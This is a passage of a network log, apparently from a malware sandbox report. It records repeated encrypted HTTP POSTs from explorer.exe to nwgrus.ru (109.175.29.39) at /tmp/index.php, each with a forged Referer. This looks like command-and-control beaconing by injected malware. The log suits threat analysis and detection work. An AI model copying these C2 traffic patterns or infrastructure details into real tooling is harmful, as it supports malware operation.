                                                                                                      Oct 8, 2024 00:20:03.458580971 CEST188OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 58 53 a8 e2
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuXSWhLyr(s|I)V<cOR(7AC6MM$ymjBf
                                                                                                      Oct 8, 2024 00:20:04.230143070 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:04 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.449745109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:04.240966082 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://xbdoluaokmu.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 251
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:04.241074085 CEST251OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 22 f9 f1
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu5"xPKDJw(w[;0gKCA&-OM3d{RBwRB.AB8-UNYIO'jt}7U"n*^,4
                                                                                                      Oct 8, 2024 00:20:05.016217947 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:04 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.449746109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:05.028496027 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://ayakqtnprwclxx.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 263
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:05.028522015 CEST263OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 63 5a a6 99
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vucZwqC!o0}D/+]DW{0$'E$UdTD]tW!{G3kmogj*4a\76J4
                                                                                                      Oct 8, 2024 00:20:05.781755924 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:05 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.449747109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:05.793008089 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://iplbmyqhcsowave.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 241
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:05.793045044 CEST241OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 26 35 f1 92
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu&57mZcIo({'A`q}h3!Tz#T$x`3qd93^,AB~ZN*N]Prucp3z
                                                                                                      Oct 8, 2024 00:20:06.618855953 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:06 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.449748109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:06.632400036 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://rdhamasxmtwwkau.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 306
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:06.632436991 CEST306OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4a 45 e3 a8
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuJE[]pj|56:ibx3c_GVTFU*ofVbs9$RY?0fjz7&)b~GaxSMj@p.5
                                                                                                      Oct 8, 2024 00:20:07.424420118 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:07 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.449749109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:07.434107065 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://floxumtvcvrlyy.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 256
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:07.434158087 CEST256OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2d 5d bc 97
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu-]nRwZU5JK+Cac1-t]WBlONfa8$4R'R/p&&(Bgdd?uB.L$v
                                                                                                      Oct 8, 2024 00:20:08.185679913 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:08 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.449750109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:08.205815077 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://mjtfeuwpovhathn.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 112
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:08.205854893 CEST112OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2f 3e a8 8c
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu/>}D!DIcyX
                                                                                                      Oct 8, 2024 00:20:08.987888098 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:08 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.449751109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:08.997863054 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://nggsthvsetexec.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 255
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:08.997879982 CEST255OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 28 2e d2 e0
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu(.MMbDco L+nhqP8>b"A9M\8,wg9*v[>z<n~xOlSc<&$hpZXFqf`zm
                                                                                                      Oct 8, 2024 00:20:09.998981953 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:09 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.449752109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:10.009479046 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://lrkgjwlbfxyrmp.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 225
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:10.009502888 CEST225OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 43 0d ee ff
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuCM4@R`n1`9u3ytw[88J*N->H]Xrb"a4{wSA8')?:4Dn
                                                                                                      Oct 8, 2024 00:20:10.795332909 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:10 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.449753109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:10.804972887 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wvxsqrgovrq.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 205
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:10.804992914 CEST205OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 46 34 a1 f9
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuF4[W\r}'@{OKhed6_Ls':>sZ'U5gS%N$VSQ/
                                                                                                      Oct 8, 2024 00:20:11.584964037 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:11 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.449754109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:11.597956896 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://ivjlkhscvhyfno.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 151
                                                                                                      Host: nwgrus.ru
